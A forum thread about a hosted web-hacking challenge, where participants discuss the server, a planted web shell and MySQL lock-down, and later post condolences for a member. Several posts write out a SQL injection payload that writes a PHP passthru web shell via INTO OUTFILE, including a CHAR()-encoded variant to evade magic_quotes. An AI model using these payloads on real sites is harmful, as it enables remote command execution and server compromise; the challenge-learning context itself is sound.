Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Security Challenge II (Web Hacking Intermediate)

Options
2»

Comments

• Closed Accounts Posts: 2,486 ✭✭✭Redshift

Any chance of the code? id love to install this on my VM and actually complete it?
    Might I suggest in future that you have to PM for the link to the challenge, might put some of the morons off bothering and give those of us who actually want to learn how to hack manually a chance.
    Many thanks for hosting this and putting it together and I hope you are not put off doing more :)

• Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep

Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.

dlofnep wrote: »
    Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.

You're a gent, thanks :)

• Registered Users Posts: 36 chuckleberryfin

That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.

• Registered Users Posts: 367 ✭✭900913

That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.

How would that work?

• Advertisement

900913 wrote: »
    How would that work?

A whitelist with iptables, but it's too much bother.

dlofnep wrote: »
    A whitelist with iptables, but it's too much bother.

I thought mysql 5.* was locked down to local access only.

user:password:host mysql.user
    root:167E7CDA67FDA14F9CCDA1B3AEFDDF49AA7xxxx:localhost

If it was

root: hash: %

Then I could possibly get access to mysql.

But by default the myql db is locked to local connections.

I'm I missing something?

I was referring to the server as a whole.

Sorry guys, I'll put the server backup tomorrow for anyone who wants to have another crack at it.

Sorry for the delay. Challenge back up: http://republicofhack.dyndns.org/

• Advertisement

Anyone who may have attempted it yesterday, apologies - I didn't allocate the DB user sufficient privs to complete the challenge. Should be ok now :)

Who dropped the web-shell btw? ;) They get bonus points.

Alright lads - too many people toying with webshells. I've taken the challenge down.

Completed
    sk
    Damo2k
    netjester
    chuckleberryfinn
    Pygmalion
    Sigtran
    rockethamster
    Redshift

How could anyone get a webshell uploaded,
    Mysql was locked to localhost,
    phpmyadmin is blocked
    and magic_quotes_gpc = On

There the only ways I know to upload a shell using mysql.

The only other way I can think of is an lfi.
    ?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

and then include it with the lfi.:confused:

But that wont work with magic_quotes_gpc = on

• Closed Accounts Posts: 5,082 ✭✭✭Pygmalion

phpmyadmin is blocked

?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

But magic_quotes wasn't on :confused:

Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.

phpmyadmin is blocked

It was uploaded to the webroot, which wasn't world-writeable. I will have a glance over the access logs later. It was from someone based in Ireland in anycase, I saved their IP address. I'm curious myself. In anycase, if the person involved wants to shoot me a friendly PM - i'd be happy to chat.

Pygmalion wrote: »
    But magic_quotes wasn't on :confused:

Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.

You still need quotes for "into outfile" or dumpfile. Otherwise you cant write your shell.
    '/tmp/shell'

Sorry for bumping an old thread - but just found out that Pygmalion was Paul Bunbury. Unfortunately, his body was found today. Very tragic, and my memory of his posts in the security forum is that he was a very capable hacker with a bright future.

Very very sad.

It's tragic to see the life of a talented young person cut short like this. I didn't know Paul other than from his posts in here. But RIP Pygmalion and my deepest condolences to his family and friends:(

Very very sad, he was only 19 years old.
    My thoughts are with his family and friends.
    RIP Pygmalion

• Advertisement
Advertisement